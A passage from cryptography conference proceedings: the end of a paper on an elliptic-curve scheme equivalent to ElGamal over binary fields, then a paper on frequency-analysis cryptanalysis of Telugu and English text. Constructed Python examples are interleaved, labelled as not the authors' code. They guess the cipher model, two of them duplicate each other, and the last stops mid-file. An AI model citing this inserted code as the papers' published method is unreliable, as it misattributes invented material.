4: Alice acquires Bob's public key $Y_{Pub,Bob}$ from $\mathrm{CERT}_{Bob}$.
5: Alice computes $rY_{Pub,Bob} = (x_{Bob}, y_{Bob})$.
6: Alice comput
es $s_{Bob} = \frac{y_{Bob} + M}{x_{Bob}}$.
7: Alice sends $(c_1, c_2) = (rG, s_{Bob})$ to Bob via a public communication channel.
Now we describe the decryption routine. Let $k_{priv,Bob}$ denote Bob's private key, so $k_{priv,Bob} G = Y_{pub,Bob}$. Because the map $f : E_{a,b} \to E_{a+\gamma,b}$ is an isomorphism, we see that $k_{priv,Bob} f(rG) = r k_{priv,Bob} f(G) = r f(k_{priv,Bob} G) = (x_{bob}, M)$.

Algorithm 2. Bob's decryption routine
input: ciphertext $(c_1, c_2) = (rG, s_{Bob})$
output: message $M$
1: Using the isomorphism $f : E_{a,b} \to E_{a+\gamma_{Bob},b}$, compute $f(rG)$.
2: Using the secret key $k_{priv,Bob}$, compute $k_{priv,Bob} f(rG) = (x, y)$.
3: Output the $y$-coordinate of $k_{priv,Bob} f(rG) = (x, y)$, which will be $M$.
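The field arithmetic of Section 2.1, the group law of Section 2.2, the isomorphism $f$ and Algorithms 1 and 2, carried through end to end as an added example (not the paper's code). It assumes a toy field $\mathbb{F}_{2^7}$ with reduction polynomial $t^7 + t + 1$, brute-forces a curve $E_{a,b}$ whose order is twice a prime $q$ using the trace-based point count of Section 2.2, and checks that the $y$-coordinate of $k \cdot f(rG)$ is $M$; every function name in the block is the example's own.

```python
import random

# Toy field (assumed, not the paper's): F_{2^7}, reduction polynomial t^7 + t + 1, n = 7 odd.
N, POLY = 7, (1 << 7) | (1 << 1) | 1
SIZE = 1 << N
INF = None  # the point at infinity O

def fmul(x, y):  # carry-less product of two field elements, reduced modulo POLY
    r = 0
    while y:
        if y & 1:
            r ^= x
        y, x = y >> 1, x << 1
        if x & SIZE:
            x ^= POLY
    return r

def finv(x):  # inverse of a non-zero element as x^(2^n - 2)
    r, e = 1, SIZE - 2
    while e:
        if e & 1:
            r = fmul(r, x)
        x, e = fmul(x, x), e >> 1
    return r

def trace(x):  # Tr(x) = sum_{i=0}^{n-1} x^(2^i), always 0 or 1
    s = 0
    for _ in range(N):
        s, x = s ^ x, fmul(x, x)
    return s

def solve(s):  # Solve(s): a root of lambda^2 + lambda = s via the half-trace, None if Tr(s) = 1
    if trace(s) != 0:
        return None
    lam = 0
    for _ in range((N - 1) // 2 + 1):
        lam ^= s
        s = fmul(fmul(s, s), fmul(s, s))  # s <- s^4, so the terms are s^(2^(2j))
    return lam

def add(a, P, Q):  # group law of y^2 + xy = x^3 + a x^2 + b (Section 2.2); b plays no part
    if P is INF or Q is INF:
        return Q if P is INF else P
    (x1, y1), (x2, y2) = P, Q
    if Q == (x1, x1 ^ y1):  # Q = -P, which also covers doubling the two-torsion point
        return INF
    lam = x1 ^ fmul(y1, finv(x1)) if P == Q else fmul(y1 ^ y2, finv(x1 ^ x2))
    x3 = fmul(lam, lam) ^ lam ^ x1 ^ x2 ^ a
    return (x3, fmul(lam, x1 ^ x3) ^ x3 ^ y1)

def smul(a, k, P):  # scalar multiple kP by double-and-add
    R = INF
    while k:
        if k & 1:
            R = add(a, R, P)
        P, k = add(a, P, P), k >> 1
    return R

def on_curve(a, b, P):
    x, y = P
    return fmul(y, y) ^ fmul(x, y) == fmul(fmul(x, x), x) ^ fmul(a, fmul(x, x)) ^ b

def curve_order(a, b):  # O, the one point with x = 0, and two points per x != 0 with Tr(x + a + b/x^2) = 0
    return 2 + 2 * sum(trace(x ^ a ^ fmul(b, finv(fmul(x, x)))) == 0 for x in range(1, SIZE))

def find_curve():  # brute-force a curve of order 2q, q prime; return (a, b, q, G), G of order q
    for b in range(1, SIZE):
        for a in (0, 1):  # only Tr(a) matters up to isomorphism (Theorem 1)
            q = curve_order(a, b) // 2
            if q > 2 and all(q % d for d in range(2, int(q ** 0.5) + 1)):
                for x in range(1, SIZE):
                    z = solve(x ^ a ^ fmul(b, finv(fmul(x, x))))
                    if z is not None:  # (x, x*z) is on E_{a,b}; doubling it lands in the prime subgroup
                        return a, b, q, smul(a, 2, (x, fmul(x, z)))
    raise RuntimeError("no suitable toy curve found")

def iso(s, P):  # f(x, y) = (x, y + x*s): E_{a,b} -> E_{a+gamma,b} with gamma = s^2 + s; f is its own inverse
    return INF if P is INF else (P[0], P[1] ^ fmul(P[0], s))

def encrypt(a, G, q, Y, M, rng):  # Algorithm 1: (rG, s) with s = (y_bob + M)/x_bob, (x_bob, y_bob) = rY
    r = rng.randrange(1, q)
    xb, yb = smul(a, r, Y)  # not O, and x_bob != 0, because Y has odd prime order q
    return smul(a, r, G), fmul(yb ^ M, finv(xb))

def decrypt(a, b, k, ct):  # Algorithm 2: map rG into E_{a+gamma,b}, multiply by k there, read off y
    c1, s = ct
    gamma = fmul(s, s) ^ s
    assert trace(gamma) == 0  # so E_{a+gamma,b} really is isomorphic to E_{a,b}
    x, y = smul(a ^ gamma, k, iso(s, c1))  # k f(rG) = f(k r G) = (x_bob, M)
    assert on_curve(a ^ gamma, b, (x, y))
    return y

def demo(seed=2009):  # full round trip on the toy curve; True when Bob recovers Alice's M
    rng = random.Random(seed)
    a, b, q, G = find_curve()
    k = rng.randrange(1, q)  # Bob's private key
    Y = smul(a, k, G)  # Bob's public key
    M = rng.randrange(SIZE)  # any field element can be sent; no point embedding is needed
    return decrypt(a, b, k, encrypt(a, G, q, Y, M, rng)) == M
```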
A natural question to ask is: what is the impact of using the $y$-coordinate to represent the secret? That is, for a given $y$-coordinate, how many points on the elliptic curve have the same $y$-coordinate? We observe the following.

Theorem 3. Let $M$ be an element of $\mathbb{F}_{2^n}$. Let $x_1$ be a fixed field element such that $\mathrm{Tr}(x_1) = \mathrm{Tr}(a)$ and $\mathrm{Tr}(x_1 + a + \frac{b}{x_1^2}) = 0$, and suppose that $(x_1, M) \in E_{a+\gamma,b}$. Now consider $A = \{x : (x, M) \in E_{a+\gamma,b}\}$; then $1 \leq |A| \leq 3$.
The result described in Theorem 3 is straightforward to establish, since for a fixed $M$ the equation $M^2 + xM = x^3 + ax^2 + b$ has at least one solution and at most three solutions. Recall that in the case of Elliptic Curve Diffie-Hellman (ECDH), the secret key is the $x$-coordinate of the elliptic curve point. For each $x$-coordinate of a non-trivial EC point that belongs to the prime subgroup, there are precisely two distinct EC points belonging to the prime subgroup that share this $x$-coordinate. Suppose that $E_k(\cdot)$ is a secure elliptic curve public-key cryptosystem for $G$ a prime subgroup of $E_{a,b}$. Assume that the cryptosystem $E_k$ represents a random mapping from a non-trivial element of the prime subgroup to a non-trivial member of the prime subgroup. Let $M$ represent the secret (i.e. the $x$-coordinate) and $C$ the ciphertext; then under this traditional method $\mathrm{Prob}(M \mid C) = \frac{2}{|G| - 1}$. Now consider the method of using the $y$-coordinate to store the secret: let $M$ represent the secret and let $P_M = (x_1, M)$. Now let $\gamma$ denote the field element as indicated in Algorithm 1. Further, let $C = E_k(P_M)$ be the ciphertext generated when we encrypt $P_M$ using $E_k$ as it is generalized in $E_{a+\gamma,b}$. Again assume that the cryptosystem $E_k$ represents a random mapping from a non-trivial element of the prime subgroup to a non-trivial member of the prime subgroup. Then applying our mapping to $M$, and assuming that $E_k$ maps a non-trivial point of the prime subgroup to a non-trivial point of the subgroup, we have $\mathrm{Prob}(M \mid C) \leq \frac{3}{|G| - 1}$.

Definition 1. Elliptic Curve Computational Diffie-Hellman Problem (EC CDH). Given an elliptic curve $E_{a,b}$, $G$ a generator of the prime subgroup of $E_{a,b}$, $xG$ and $yG$, the problem is to compute $xyG$.

The EC CDH problem is considered to be computationally hard. The following theorem is a well-known result that ties the difficulty of breaking El Gamal to the EC CDH problem.

Theorem 4. Any algorithm that solves the EC Computational Diffie-Hellman problem can be used to decrypt EC El Gamal ciphertexts, and any algorithm that can decrypt EC El Gamal ciphertexts can be used to solve the EC Computational Diffie-Hellman problem.

Now consider the security of our simple encryption scheme (i.e. decrypting ciphertexts without the private key). Assume a ciphertext-only attack; then the adversary will have the following information available: the elliptic curve $E_{a,b}$, the generator $G$, the public key $Y_{pub,bob} = kG$, and the ciphertext $(c_1, c_2) = (rG, s_{bob})$. The adversary's goal is to determine $M$. However, we will assume that a break of the simple encryption scheme requires that the adversary computes $(x_1, M)$, which belongs to the elliptic curve $E_{a+\gamma,b}$. If we held a stricter notion of a break, namely that only $M$ becomes known, then the adversary would have to solve a cubic equation within $\mathbb{F}_{2^n}$ to find the $x$-coordinate of the EC point. Using the assumption that a break of the simple encryption scheme requires the adversary to compute the point $(x_1, M)$, we have the following.

Theorem 5. Any algorithm that solves the EC Computational Diffie-Hellman problem (for elliptic curves defined over $\mathbb{F}_{2^n}$) can be used to decrypt simple encryption scheme ciphertexts, and any algorithm that can decrypt simple encryption scheme ciphertexts can be used to solve the EC Computational Diffie-Hellman problem (for elliptic curves defined over $\mathbb{F}_{2^n}$).

Proof. Suppose $\mathcal{A}$ is an algorithm that can solve the EC Computational Diffie-Hellman problem (for elliptic curves defined over $\mathbb{F}_{2^n}$). Thus $\mathcal{A}$ takes as inputs: an elliptic curve $E_{a,b}$, $G$ a generator of the prime subgroup of $E_{a,b}$, $kG$, and $rG$; $\mathcal{A}$ outputs $krG$. Now consider the input consisting of the elliptic curve $E_{a,b}$, $G$ a generator of the prime subgroup of $E_{a,b}$, a public key $Y_{pub,bob} = k_{priv,bob} G$, $c_1 = rG$, and $c_2 = s_{bob}$. Feed the elliptic curve $E_{a,b}$, the generator $G$, the public key $Y_{pub,bob} = k_{priv,bob} G$, and $c_1 = rG$ to algorithm $\mathcal{A}$. Then $\mathcal{A}$ will output $k_{priv,bob} rG$. Let $\gamma = s_{bob}^2 + s_{bob}$. Thus $\mathrm{Tr}(\gamma) = 0$. Consequently $f(x, y) = (x, y + x \cdot s_{bob})$ is an isomorphism that maps $E_{a,b}$ to $E_{a+\gamma,b}$. Hence $f(k_{priv,bob} rG)$ will be some point $(x', y')$ whose $y$-coordinate $y'$ is $M$.

Suppose $\mathcal{B}$ is an algorithm that can decrypt simple encryption scheme ciphertexts. Thus $\mathcal{B}$ takes as inputs: an elliptic curve $E_{a,b}$, $G$ a generator of the prime subgroup of $E_{a,b}$, $kG$, $rG$ and $s$; $\mathcal{B}$ outputs $(x_1, M)$. Now consider the input: the elliptic curve $E_{a,b}$, $G$ a generator of the prime subgroup of $E_{a,b}$, $kG$, and $rG$. Select $s \in_R \mathbb{F}_{2^n}$ randomly. Let $\gamma = s^2 + s$. Then $\mathrm{Tr}(\gamma) = 0$. Feed the inputs $E_{a,b}$, $G$, $kG$, $rG$, and $s$ to algorithm $\mathcal{B}$. Then $\mathcal{B}$ will output $(x', M)$. Here $(x', M) \in E_{a+\gamma,b}$ is such that $f(krG) = (x', M)$, where $f((x, y)) = (x, y + x \cdot s)$ is an isomorphism that maps $E_{a,b}$ to $E_{a+\gamma,b}$. Recall that $f^{-1}(x, y) = (x, y + x \cdot s)$. Thus $krG = f^{-1}(f(krG)) = f^{-1}((x', M)) = (x', M + x' \cdot s)$. Hence the adversary has computed $krG$ and has solved the EC CDH problem. □
Thus the EC CDH problem (for elliptic curves defined over $\mathbb{F}_{2^n}$) is equivalent to the problem of decrypting simple encryption scheme ciphertexts. Since EC CDH is equivalent to EC El Gamal, we can immediately infer the equivalence of the problem of decrypting EC El Gamal ciphertexts and decrypting simple encryption scheme ciphertexts.

The homomorphic encryption properties of El Gamal and EC El Gamal public-key encryption are well known. That is, for EC El Gamal, $\mathrm{ENC}_{El\,Gamal}(M_1) = (r_1 G, M_1 + k_{priv,bob} r_1 G)$. Then

$$\mathrm{ENC}_{El\,Gamal}(M_1) \cdot \mathrm{ENC}_{El\,Gamal}(M_2) = (r_1 G, M_1 + k_{priv,bob} r_1 G) \cdot (r_2 G, M_2 + k_{priv,bob} r_2 G) = (r_1 G + r_2 G,\; M_1 + M_2 + k_{priv,bob} r_1 G + k_{priv,bob} r_2 G) = \mathrm{ENC}_{El\,Gamal}(M_1 + M_2).$$
Observe that our simple encryption scheme $\mathrm{ENC}(M) = (rG, s_{bob})$, where $r k_{priv,bob} G = (x_{bob}, y_{bob})$ and $s = \frac{y_{bob} + M}{x_{bob}}$, is not a homomorphic encryption. This follows from the fact that $\mathrm{ENC}(M_1) \cdot \mathrm{ENC}(M_2) = (r_1 G, s_1) \cdot (r_2 G, s_2) = (r_1 G + r_2 G, s_1 + s_2) \neq \mathrm{ENC}(M_1 + M_2)$. For $i = 1$ and $2$, $s_i = \frac{y_{bob,i} + M_i}{x_{bob,i}}$, where $(x_{bob,i}, y_{bob,i}) = k_{priv,bob} r_i G$. Thus $s_1 + s_2 = \frac{y_{bob,1} + M_1}{x_{bob,1}} + \frac{y_{bob,2} + M_2}{x_{bob,2}}$. Now $\mathrm{ENC}(M_1 + M_2) = (r' G, s')$, so if $\mathrm{ENC}(M_1 + M_2) = \mathrm{ENC}(M_1) \cdot \mathrm{ENC}(M_2)$, then $r' G = (r_1 + r_2) G$ and $s' = s_1 + s_2$. However, for the simple encryption scheme to be homomorphic, $s'$ would have to satisfy $s' = \frac{y_3 + M_1 + M_2}{x_3}$, where the point $(x_3, y_3)$ is the sum of the EC points $k_{priv,bob} r_1 G + k_{priv,bob} r_2 G$. By the formula for the sum of two EC points we have $s_1 + s_2 \neq \frac{y_3 + M_1 + M_2}{x_3}$, where the point $(x_3, y_3)$ is the sum of the EC points $k_{priv,bob} r_1 G + k_{priv,bob} r_2 G$, and so the simple encryption scheme is not homomorphic.
4 Conclusion

In this paper we have discussed elliptic curve cryptography for elliptic curves $E_{a,b}$ defined over $\mathbb{F}_{2^n}$. We have discussed a well-known isomorphism that maps $E_{a,b}$ to $E_{a+\gamma,b}$. Further, we have discussed how to use the isomorphism to construct a simple encryption scheme that is equivalent to EC El Gamal.
References
1. Blake, I.F., Smart, N., Seroussi, G.: Elliptic Curves in Cryptography. London Mathematical Society Lecture Note Series. Cambridge University Press, Cambridge (1999)
2. Gaudry, P., Hess, F., Smart, N.: Constructive and Destructive Facets of Weil Descent on Elliptic Curves. Journal of Cryptology 15(1), 19–46 (2002)
3. Lidl, R., Niederreiter, H.: Finite Fields, 2nd edn. Cambridge University Press, Cambridge (1997)
4. Lopez, J., Dahab, R.: Improved Algorithms for Elliptic Curve Arithmetic in GF(2^n). In: Tavares, S., Meijer, H. (eds.) SAC 1998. LNCS, vol. 1556, pp. 201–212. Springer, Heidelberg (1999)
5. Mao, W.: Modern Cryptography: Theory and Practice. Prentice Hall, New York (2004)
6. Miller, V.S.: Use of Elliptic Curves in Cryptography. In: Williams, H.C. (ed.) CRYPTO 1985. LNCS, vol. 218, pp. 417–426. Springer, Heidelberg (1986)
7. NIST: Recommended elliptic curves for federal use, http://www.nist.gov
8. Seroussi, G.: Compact Representation of Elliptic Curve Points over F_{2^n}. HP Labs Technical Reports, pp. 1–6, http://www.hpl.hp.com/techreports/98/HPL-98-94R1.html
9. Silverman, J.: The Arithmetic of Elliptic Curves. Springer, New York (1986)
10. Trappe, W., Washington, L.C.: Introduction to Cryptography with Coding Theory, 2nd edn. Prentice Hall, Englewood Cliffs (2006)
11. Institute of Electrical and Electronics Engineers (IEEE) Standard 1363-2000: Standard Specifications for Public Key Cryptography (January 2000)
Analysis of Text Complexity in a Crypto System – A Case Study on Telugu

M.S.V.S. Bhadri Raju (1), B. Vishnu Vardhan (2), G.A. Naidu (3), L. Pratap Reddy (4), and A. Vinaya Babu (5)

(1) Associate Professor of CSE, S.R.K.R. Engineering College, Bhimavaram, A.P., India, msramaraju@gmail.com
(2) Professor & Head of CSE, Indur Institute of Engg & Tech., Siddipet, A.P., India, mailvishnu@yahoo.com
(3) Research Scholar, Dept of CSE, JNTU Kakinada, Kakinada, A.P., India
(4) Professor & Head of ECE, Jawaharlal Nehru Technological University, Hyderabad, prataplr@rediffmail.com
(5) Professor of CSE & Director, Admissions, JNT University, Hyderabad, A.P., India
Abstract. Global connectivity has established the practice of data transactions. Data or information is available in different forms such as text, image, audio and video. Security mechanisms are built around security algorithms under the assumption that the information is a bit stream, whereas human perception deals with information in forms other than a bit stream. In the transaction process, users work with human-understandable formats of data. A simple case, text data, involves multiple scripts represented by multiple combinations of bit streams. The transformation of the basic characteristics that are embodied in a script is an interesting area to be explored in security models. The present work analyzes the basic characteristics of a script in the form of the frequency distribution of character code points. The proposed model is evaluated on Telugu script as a case study, with a comparison on Latin text. The evaluation is limited to 8-bit and 16-bit key sizes.

Keywords: Bit Stream, Frequency Distribution, Character Code Points, Script.
1 Introduction

Secured communication is a challenging task with so many languages in the world, consisting of various characters with different properties and behaviour. Cryptography is one of the methods by which the security goals can be achieved, by means of encryption and decryption. In general, such a scheme uses a symmetric-key algorithm or an asymmetric algorithm in which each block of a fixed- or variable-size bit stream is transformed into a cipher stream. They use either block cipher or stream cipher techniques for the transformation. The parameters in these schemes are mainly associated with the algorithm and the key. These algorithms are evaluated adequately on ASCII-based Latin text. To attain greater levels of security, emphasis is placed on incremental increases in the key size, and the result is increased hardware complexity. The introduction of Unicode allowed a unique representation of all characters of the script-based languages of the world. The process of localization [1] accelerated with the increasing exchange of language-dependent content. This phenomenon demands security systems that are specific to the script. In this scenario the characteristics of the text play a vital role and need to be considered as a parameter. The transformation of text during the cryptographic process is to be analyzed for various levels of security. A simple logical conclusion may state that if the text of a script is complex, then the same level of security may be achieved with a smaller key size. In this paper we address the information security issues related to Indic scripts with an emphasis on the complexity of Telugu [2,3], which is mainly used in the southern region of India and ranks second among Indian languages.

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 281–288, 2009. © Springer-Verlag Berlin Heidelberg 2009

M.S.V.S.B. Raju et al.
2 Review

Different approaches to cryptanalysis are available in the literature that adopt language characteristics to understand the strength of a cipher system. One such approach is frequency analysis, in which determining the frequency of each symbol in the encrypted message leads to a prediction of the plaintext. This information is used along with knowledge of the symbol frequencies in the language to help determine which ciphertext symbol maps to which plaintext symbol. Success may vary based on the amount of available information about the cryptosystem. In transposition systems, the symbol frequencies of a cryptogram are identical to those of the plaintext. In the simplest substitution systems, each plaintext symbol has one equivalent in the ciphertext. These symbol frequencies are not identical to the plaintext frequencies, but the same numbers will be present in the frequency count as a whole. K.W. Lee et al. developed [4] the cryptanalytic technique of enhanced frequency analysis using the combined techniques of monogram frequencies, keyword rules and dictionary checking. The proposed three-tier approach mechanizes the cryptanalysis of monoalphabetic simple substitution ciphers. Thomas Jakobsen proposed [5] a method for fast cryptanalysis of substitution ciphers which uses knowledge of the digram distribution of the ciphertext. The study of encrypted messages is subdivided into determination of the language and reconstruction of the keys and/or the plaintext. Recent approaches in the literature concentrate on retrieval of the plaintext based on the features of the respective language. Each language has certain characteristics [6,7] that aid in successful cryptanalysis. There are two general approaches to solving simple ciphers. One makes use of the frequency characteristics, and the other uses the orderly progression of the alphabet to generate all possible decipherments from which the correct plaintext can be picked out.

For example, the individual letters of any language occur with greatly varying frequencies [8]. As with single letters and their typical frequency expectations, multiple-letter combinations are also found with varying but predictable frequencies. Extensive statistical analysis of these frequencies is most helpful when retrieving part of a plaintext message. Bárbara E. et al. presented a method [9] for deciphering texts in Spanish using the probability of usage of letters in the language; the frequency of the different letters is the clue to the proposed deciphering. Bao-Chyuan et al. proposed [10] a method to improve the encryption of oriental-language texts, with a case study on Chinese text files, which are ideogram-based and differ from Latin text. Moreover, the number of characters that appear in Chinese is much larger than in English. The scheme proposed by Bao reported that large Chinese texts can be handled more efficiently. A method for Persian/Arabic script is proposed [11] with regard to the shapes of characters and their position in the word. In another model, steganography is attempted [12] on Persian/Arabic Unicode-based text using the above characteristics, including the writing system. In the present paper the frequency characteristics of character code points are explored.
3 Security Model

Every language has certain parameters such that the language rules are embodied in sequence while formulating a document. The complexity of a script mainly depends on the character, word and sentence formulation methods. A document with a meaningful summary can be represented as D ⊂ S ⊂ W ⊂ C, where 'D' is the document and 'S', 'W' and 'C' are sentences, words and characters respectively. In the case of English, 'C' is represented with the help of a one-to-one correspondence with character code points in any machine, whereas Indic script representation is associated with a twofold phenomenon: 'C' in real terms is associated with a 'syllable', which in turn is represented as a set of multiple character code points. Now 'C' can be written as Sy ⊂ CC, where 'Sy' is the syllable and 'CC' is the character code point. In the actual transformation, the character code points are transformed with the help of the crypto system. This transformation is done onto a different plane where the mapping is a reversible phenomenon. The transformation characteristics of the meaningful units from the standpoint of the frequency characteristics are the point of interest in the present work. Generally, the frequency characteristics differ from language to language. In the case of English, due to the smaller size of the character set, the frequency characteristics may effectively be reflected in the transformed data. If the size of the meaningful units is large enough, then the complexity of the frequency characteristics is to be evaluated. In the mapping phenomenon, we have attempted to understand the reflection of the frequency characteristics and its impact on cryptanalysis. This is the context in which the present work is addressed. The proposed model defines the meaningful units that are embedded in text documents [9] as essential units, also treated as meaningful units in the form of a character or byte stream. The byte stream is a symbolic representation of the text.

In the case of Indic scripts this stream is a complex byte stream, whereas in the case of Latin text the byte stream is a one-to-one mapping. The present model addresses this specificity by taking into consideration words in the form of syllables and extracting the byte stream from the syllables. They consist of single code point units or multiple code point units. They are transformed into a code point byte stream and converted into a bit stream, which undergoes a transformation similar to that of any system. The code point streams that are derived from syllables are converted to a bit stream. A key stream is generated using an efficient random number generator. Simple 8-bit and 16-bit key streams are used in the present work. With this key stream, a transformation function is applied to the bit stream, resulting in the ciphertext, as illustrated in Fig. 1 and Fig. 2.
Fig. 1. Encryption of Original Plain Text (block diagram: Original Plain Text stream → Transformation function → Encrypted Text stream)

Fig. 2. Estimated Plain Text using frequency characteristics (block diagram: Encrypted Text stream → Function of frequency characteristics → Estimated Plain Text)

Fig. 3. Sample Plain Text, Encrypted Text and Decrypted Text in Telugu

A simple plain text, its encrypted text and the decrypted text, in English and Telugu, are shown in Fig. 3.
4 Frequency Distribution of Character Code Points of Telugu Script

The basic unit of script description is the syllable, which is defined by the canonical structure ((C)C)CV. The machine representation of this structure is composed of a set of character code points that are defined in the Unicode code chart. Even though syllables are the meaningful units of the script, they abide by the specific grammar rules of the script, whereas the character code points in the machine representation are perceived as a reflection of these grammar rules. It is necessary to understand the complex nature of the script in the usage of the syllables, which is dynamic in historical perspective. In the present work we consider the machine representation of character code points and their characteristics in the form of a frequency distribution as one of the pieces of information adopted for cryptanalysis. Many attempts have been made on Latin text to extract the frequency distribution of the basic alphabet from samples of over 300,000 character code points. They demonstrated the dominance of a small set of characters in regular usage. A similar concept is extended in the present work to evaluate the characteristic nature of the variable character code points that are embodied in the syllables of Telugu text. A sample of 2,400,000 character code points, mainly compiled from present-day usage of the text, is used for the above analysis.
5 Cryptanalysis Using Frequency Distribution

The proposed model is evaluated for two languages, English and Telugu. The encryption algorithm is applied to Telugu text samples of different sizes. For this process an 8-bit key is generated randomly using the OS-based random generator. The plaintext is encrypted using the proposed algorithm and the randomly generated 8-bit key, resulting in the ciphertext. The frequencies of the different characters in the ciphertext are extracted. A mapping is carried out between the characters of the plaintext and the ciphertext based on these frequencies. The characters in the ciphertext are then replaced with the mapped characters of the plaintext, and the percentage of exact retrieval as compared to the plaintext is calculated. When English text is considered, the problems are much smaller, because the correspondence is directly between the transformed text and the original text. Though the key is generated randomly, since it is fixed, the mapping function transforms each character into a point in an orthogonal plane. The percentage of retrieved code points using the frequency distribution is calculated. If we consider Telugu script, the character codes that exist in a medium-sized original text need not be the complete set. In the transformation process, not all character codes of the original set of code points may exist. This may lead to confusion in the cryptanalysis. We adopted a threshold function in the cryptanalysis process for the reverse mapping. The percentage of plaintext that can be retrieved is observed to be in the range of 10% to 20%, depending on the size of the plaintext, in the case of Telugu. The same process is applied to English text of different sizes. The percentage of plaintext that can be retrieved varies from 25% to 50%, depending on the size of the plaintext, as illustrated in Table 1. This percentage in the case of Telugu is relatively low when compared to English, which is because of the increased complexity involved in Telugu script.

The proposed cryptographic model is extended further with a 16-bit key on Telugu using the above-mentioned approach. A mapping is carried out between the characters of the plaintext and the ciphertext. The characters in the ciphertext are then replaced with the mapped characters of the plaintext, and the percentage of exact retrieval as compared to the plaintext is calculated, as illustrated in Fig. 4 and Table 2.
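The frequency-rank reverse mapping of Section 5, together with the frequency analysis reviewed in Section 2, run on constructed samples as an added example (not the authors' implementation; the page does not specify their transformation function). It assumes repeating-key XOR over the UTF-8 byte stream as the transformation, the plaintext's own frequency profile as the reference (as in the paper), and two constructed texts ENGLISH and TELUGU; it reports the exact-retrieval percentage for an 8-bit and a 16-bit key.

```python
from collections import Counter

# Constructed sample texts (assumed, not the paper's corpus): a Latin sentence and a
# short Telugu passage; each Telugu syllable is encoded as several code points / bytes.
ENGLISH = ("the quick brown fox jumps over the lazy dog while the other dogs sleep "
           "and the cat watches the fox with the patience of a hunter")
TELUGU = "తెలుగు భాష భారతదేశం లో మాట్లాడే భాష నమస్కారం తెలుగు ప్రజలు"


def xor_stream(data, key):
    """Assumed 'transformation function': repeating-key XOR over the byte stream.
    An 8-bit key is one fixed byte substitution; a 16-bit key alternates two substitutions."""
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(data))


def rank_symbols(stream):
    """Symbols ordered by descending frequency; ties broken by symbol value (the analyst's only option)."""
    counts = Counter(stream)
    return sorted(counts, key=lambda sym: (-counts[sym], sym))


def frequency_attack(ciphertext, reference):
    """Section 5's reverse mapping: the i-th most frequent ciphertext symbol is read as the
    i-th most frequent symbol of the reference profile; left-over symbols are kept as they are."""
    mapping = dict(zip(rank_symbols(ciphertext), rank_symbols(reference)))
    return bytes(mapping.get(c, c) for c in ciphertext)


def retrieval_rate(plaintext, estimate):
    """Percentage of byte positions recovered exactly (the paper's 'exact retrieval')."""
    hits = sum(p == e for p, e in zip(plaintext, estimate))
    return 100.0 * hits / len(plaintext)


def run_case(plaintext, key, reference=None):
    """Encrypt the UTF-8 stream of `plaintext` with `key`, attack it with the frequency profile of
    `reference` (the plaintext itself when None, as in the paper), and score the estimate."""
    data = plaintext.encode("utf-8")
    profile = (reference if reference is not None else plaintext).encode("utf-8")
    estimate = frequency_attack(xor_stream(data, key), profile)
    return retrieval_rate(data, estimate)


def compare(key):
    """Retrieval percentages for the two constructed samples under the same key."""
    return {"english": run_case(ENGLISH, key), "telugu": run_case(TELUGU, key)}


if __name__ == "__main__":
    for key in (b"\x5a", b"\x5a\xa5"):  # an 8-bit and a 16-bit key, fixed for reproducibility
        print(len(key) * 8, "bit key:", compare(key))
```

With a one-byte key the cipher is a fixed byte substitution, so the attack fails only where symbol counts tie; with a two-byte key each plaintext byte has two ciphertext images and the profile is split, which is the effect the paper measures with its 16-bit key.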
Fig. 4. Retrieved Text based on Frequency distribution in Telugu
The results indicate that the percentage of retrieved plain text is now found in the range of 1-10% only. Reduced efficiency of mapping is an indicative measure of language complexity with specific reference to the frequency distribution of character code points.

Table 1. Percentage of retrieved character code points using frequency distribution for English and Telugu with 8-bit key
Plain text size (number of characters)   English (%)   Telugu (%)
2000                                     24.43         20.7
4000                                     49.49         17.1
10000                                    27.12         8.5
15000                                    50.89         16.7
22000                                    41.09         15.05
35000                                    41.04         15.89
64000                                    46.81         1.15
75000                                    31.99         1.94
Table 2. Percentage of retrieved character code points using frequency distribution for Telugu with 8-bit and 16-bit keys

Plain text size (number of characters)   8-bit key (%)   16-bit key (%)
2000                                     20.7            4.4
4000                                     17.1            2.05
10000                                    8.5             7.3
15000                                    16.7            4.47
22000                                    15.05           9.97
35000                                    15.89           4.31
64000                                    1.15            0.8
75000                                    1.94            1.2
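The measurement procedure of this section (random 8- or 16-bit key, encryption, frequency-rank mapping from cipher text back to plain text, percentage of exactly retrieved code points), as an added example that is not the paper's own code. It assumes the "simple encryption model" is an XOR of each character code point with the key, since the cipher itself is not given in this section, and all sample texts are constructed.

```python
"""Added example, not the paper's code: how much plaintext a frequency-rank
mapping recovers from a keyed substitution of character code points.
Assumption: the 'simple encryption model' XORs every code point with the random
key (a bijection on code points, so symbol frequencies survive encryption)."""
import os
from collections import Counter


def random_key(bits: int = 8) -> int:
    """Key from the OS random generator, truncated to `bits` (8 or 16 in the paper)."""
    nbytes = (bits + 7) // 8
    return int.from_bytes(os.urandom(nbytes), "big") & ((1 << bits) - 1)


def code_points(text: str) -> list:
    return [ord(ch) for ch in text]


def encrypt(plain: list, key: int) -> list:
    """Assumed model: XOR each code point with the key."""
    return [cp ^ key for cp in plain]


def decrypt(cipher: list, key: int) -> list:
    return [c ^ key for c in cipher]


def frequency_mapping(cipher: list, reference: Counter, threshold: int = 1) -> dict:
    """Pair the k-th most frequent ciphertext symbol with the k-th most frequent
    symbol of the reference (language) distribution. Symbols seen fewer than
    `threshold` times are left unmapped; this is our reading of the paper's
    threshold function: a medium-size Telugu text does not contain the whole
    code point set, and rare symbols would otherwise pair up essentially at random."""
    c_ranked = [s for s, n in Counter(cipher).most_common() if n >= threshold]
    r_ranked = [s for s, n in reference.most_common() if n >= threshold]
    return dict(zip(c_ranked, r_ranked))


def retrieval_percentage(plain: list, cipher: list, reference: Counter,
                         threshold: int = 1) -> float:
    """Percentage of positions where the mapped ciphertext symbol equals the plaintext."""
    mapping = frequency_mapping(cipher, reference, threshold)
    hits = sum(1 for c, p in zip(cipher, plain) if mapping.get(c) == p)
    return 100.0 * hits / len(plain)


def score(plain_text: str, reference_text: str, key: int, threshold: int = 1) -> float:
    """Encrypt `plain_text` under `key`, then reverse-map using the frequencies of
    `reference_text` (the known language distribution) and score the retrieval."""
    plain = code_points(plain_text)
    reference = Counter(code_points(reference_text))
    return retrieval_percentage(plain, encrypt(plain, key), reference, threshold)


def experiment(plain_text: str, reference_text: str, bits: int = 8) -> float:
    """One run of the paper's procedure with a fresh random key of `bits` bits."""
    return score(plain_text, reference_text, random_key(bits))


# Constructed samples (not the paper's corpora).
PLAIN_EN = "the remote station sends the encrypted report to the master station every hour"
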